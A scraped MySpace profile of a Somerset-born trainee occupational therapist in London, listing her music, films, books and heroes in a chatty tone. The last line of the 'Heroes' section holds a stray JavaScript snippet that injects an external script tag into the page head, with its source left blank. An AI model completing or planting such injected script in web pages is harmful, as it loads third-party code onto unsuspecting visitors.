About Me

CLICK HERE TO GET A PRE-MADE MYSPACE LAYOUTSomerset girl now living in London, trying to get somewhere, but taking the long way round! I love the countryside and miss the sea, stars and fresh air every day, but I have to admit that I am increasingly becoming a city chick after living here for 2 years! Officially I am a trainee Occupational Therapist, but this is just fancy talk for saying I'm a student (don't tell anyone!). I advise you not to ask me what occupational therapy is! I don't have a short answer and you'll regret asking!! Have just gone back to uni and have soooooooooo much work to do!!......in-fact have no idea why I am doing this right now instead!! But that tells you all you need to know really!! I am a procrastination queen!! I'm all about the music and the dance (there's pretty much nothing I love to do more!). I love to meet new people and to have a diverse range of friends, so feel free to drop me a line whenever!...p.s.........this here is my idea of the perfect man! ARGGGGHHH 'tis! So if you know anyone who might measure up, let me know!:This makes me smile:This makes me cry:

My Interests

Dancing until I fall down, swimming, spontaneous skipping, drunken gymnastics, Blue peter style projects, having fun, trying / seeing / learning new things.

I'd like to meet:

All good people.........and Mr Folds

Music:

I've been told I should write more here, so here goes, you asked for it! Music is soooo totally important to me, I genuinely find it difficult to go any amount of time without some tunes in some form! Personal choice of music is a very intimate thing and I have just as many guilty pleasures as the next person. I have the typically eclectic taste that you would expect from someone who grew up with a dippy hippy mum and heavy metal sister and just about every other genre representaed through various friends and family members. So, here I am just going to put down the people I listen to when at home and away from the metropolis of music that is the internet. For my other loves, you can check out my profile. Also, I am just going to put down my most played, or I will get extreme finger ache!! So here goes...... TO CHILL OUT: Snow Patrol (Run=funeral song#1.......what! you have to think of these things!!), The Beta Band, Badly Drawn Boy,Lenny Kravitz, Tracy Chapman, James Morrison.....should prob also put here the dodgy mix tape that I made from my mums vinyl when I was about 14, featuring much old school motown, soul and various beatle (group and solo)stuff, which I still love and sing along to regularely at the top of my voice!! GENERAL LISTENING: I am possibly unhealthily obsessed with Ben Folds right now....just for being one of the best boys ever and my last big gig!...so much fun! Kings of Leon (playing now), Kasabian, Green day(Good Riddance=funeral song #2!), Chili Peppers, Pixies, Oasis, Steroephonics, Killers,dEUS, Fratellis, Stone Roses, The Verve, Secret Machines. MUSIC TO GET FIRED-UP TO: Hoobastank, Fatboy Slim, Josh Wink, Krafty Kuts, Pink ~("respect" is essential before any girly outing!), The Teaches of Peaches, Beastie Boys, Prodigy (I learnt to dance to "start the dance" (just 1 of the best tunes EVER!). There's prob plenty of music that I love listening to just as much, if not more than some of the above, but these are the people who I've actually gone out and bought their CD's and who are always playing in my house, so what we have here is a little glimpse into my world!! ...Also, I hear that there's an up and coming band called Nemhain that are worth a listen, before they get too big to Fratternis with the little people like us!

Movies:

Grease, Dirty Dancing, A hard Days Night, Charlie and the Chocolate Factory (old school), Bugsy Malone, Pretty in Pink (unexplained past Andrew Macarthy lust!) Ferris Buellers day off, The Graduate: Again, it is the whole singing and dancing thing, I want to live in a musical! Also-Rude Awakening where many of my morals and values stem from (Cheech Marin was an early role model!). I also love scary thrillers, but can only watch them when the windows and doors are locked and someone else is stopping over. The usual Suspects is genius! I love Kevin Spacey! And finally, who doesn't love The Goonies!!

Television:

Nothing that I am too fussed about at the moment. I usually just fall asleep to tell you the truth.

Books:

Favourites are The Curious Incident of the Dog in the Night Time, A Million Little Pieces, Memoirs of a Geisha, The Diving Bell and the Butterfly, Patricia Cornwall (Kay Scarpetta) novels. I am currently reading the Italian Language Survival Guide and Introduction to research in Health Sciences (not recommended!).

Heroes:

Anyone who knows what they want and goes and gets it. People who don't gossip and don't judge. Commuters who manage to remember that trains still count as the real world and therefore manners still apply! (a rare breed!). Also commuters who are brave enough to make eye-contact and (heaven forbid!) even speak!! .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"
